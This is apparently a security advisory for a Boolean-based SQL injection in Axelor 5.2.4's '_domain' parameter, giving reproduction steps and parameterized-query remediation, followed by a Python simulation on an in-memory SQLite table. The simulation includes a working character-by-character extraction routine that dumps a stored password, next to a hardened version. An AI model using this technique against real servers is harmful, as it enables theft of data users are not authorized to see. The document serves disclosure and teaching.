Axelor Boolean-Based SQL Injection Vulnerability
Vulnerability
A Boolean-based SQL injection vulnerability exists in Axelor version 5.2.4 in the handling of the '_domain' parameter. The parameter's value is evaluated as part of a database query, so an attacker who controls it can append conditions of their own choosing. The query's result, and therefore the server's response, then depends on whether those conditions are true, which lets the attacker read facts about the database off the response without ever seeing the query itself.
Impact
An authenticated attacker can use the true/false behaviour of injected conditions to infer, one yes/no answer per request, and ultimately exfiltrate the contents of the application's database, including data the attacker's own account is not authorized to see.
Reproduction
To reproduce this vulnerability, log into an Axelor account and intercept a request that carries the '_domain' parameter. Replace its value with a condition that is always true, such as 1=1, and record the response. Then send the same request with an always-false condition, such as 1=2, and compare. A consistent difference between the two responses (for example, records returned versus none) shows that the parameter's value is being evaluated as part of the query, i.e. the injection works. Compare on a stable feature of the response such as the number of records or the body length rather than on the raw bytes, since timestamps and other dynamic fields can differ between any two responses. Because the server only reveals whether the injected condition held, the attacker then asks a series of such yes/no questions (for instance, whether a given character of a chosen value equals a guess) and reconstructs arbitrary database content from the answers, up to a full dump.
Remediation
To address this vulnerability, build database queries with parameterized queries or prepared statements, so that user-supplied values are bound as parameters and can never alter the structure of the statement. Axelor is a Java application built on JPA/Hibernate, so the relevant mechanisms are JPA named or positional parameters, the Criteria API, or the framework's own query API with bound parameters; a filter expression such as the '_domain' value should not be assembled from client input by string concatenation. Where the client must be allowed to choose a filter, restrict it on the server to an allow-list of field names and operators and bind the comparison values as parameters; reject any input that does not match the expected form rather than attempting to sanitize it.
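As an added example that is not part of this advisory and not Axelor's code, the following Python script simulates, against a constructed in-memory SQLite table, the server-side pattern that produces this class of bug (a client-supplied filter concatenated into the WHERE clause), the 1=1 / 1=2 differential test from the Reproduction section, character-by-character extraction through that Boolean oracle, and the hardened allow-list-plus-bound-parameter form described under Remediation. The table, column and function names, the sample rows, and the use of SQLite rather than Axelor's database are assumptions for illustration.

```python
"""Constructed simulation of a Boolean-based SQL injection through a free-form
filter parameter (like Axelor's `_domain`), plus a hardened replacement.
Not Axelor's code; table, columns and data are made up for this example."""
import sqlite3

# Constructed sample data standing in for an application user table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE auth_user (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
conn.executemany("INSERT INTO auth_user(name, password) VALUES (?, ?)",
                 [("admin", "s3cr3t"), ("alice", "wonderland")])


def vulnerable_search(domain: str) -> list:
    """Hypothetical server-side pattern that causes the bug: the client-supplied
    filter text is concatenated straight into the WHERE clause."""
    sql = f"SELECT id, name FROM auth_user WHERE ({domain})"
    return conn.execute(sql).fetchall()


def oracle(condition: str) -> bool:
    """Boolean oracle: does the injected condition make the server return rows?
    Any stable difference between the true and false case works as the signal;
    here it is simply whether any record came back."""
    return len(vulnerable_search(condition)) > 0


def confirm_injection() -> bool:
    """The 1=1 / 1=2 differential test from the Reproduction section."""
    return oracle("1=1") and not oracle("1=2")


def extract(subquery: str,
            charset: str = "abcdefghijklmnopqrstuvwxyz0123456789",
            max_len: int = 32) -> str:
    """Dump a scalar value one character at a time through the oracle.
    `subquery` is an attacker-chosen scalar SQL subquery; every guess is one
    true/false question sent to the server."""
    out = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            # substr() is SQLite syntax; other engines use SUBSTRING().
            if oracle(f"1=1 AND substr(({subquery}),{pos},1)='{ch}'"):
                out += ch
                break
        else:
            break  # no character matched: the string has ended
    return out


# Hardened version: the client never supplies SQL text, only a field, an
# operator and a value. Field and operator are checked against allow-lists;
# the value is bound as a parameter so it cannot change the query structure.
ALLOWED_FIELDS = {"id", "name"}
ALLOWED_OPS = {"=", "!=", "<", ">", "LIKE"}


def safe_search(field: str, op: str, value) -> list:
    if field not in ALLOWED_FIELDS or op not in ALLOWED_OPS:
        raise ValueError("unsupported filter")
    sql = f"SELECT id, name FROM auth_user WHERE {field} {op} ?"
    return conn.execute(sql, (value,)).fetchall()


if __name__ == "__main__":
    print("injection confirmed:", confirm_injection())
    print("admin password:", extract("SELECT password FROM auth_user WHERE name='admin'"))
    print("payload as bound value:", safe_search("name", "=", "x' OR 1=1 --"))
```

Note that `safe_search` rejects a request for the `password` field outright rather than sanitizing it, and that an injection payload passed as the value matches no row because it is compared as a literal string.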
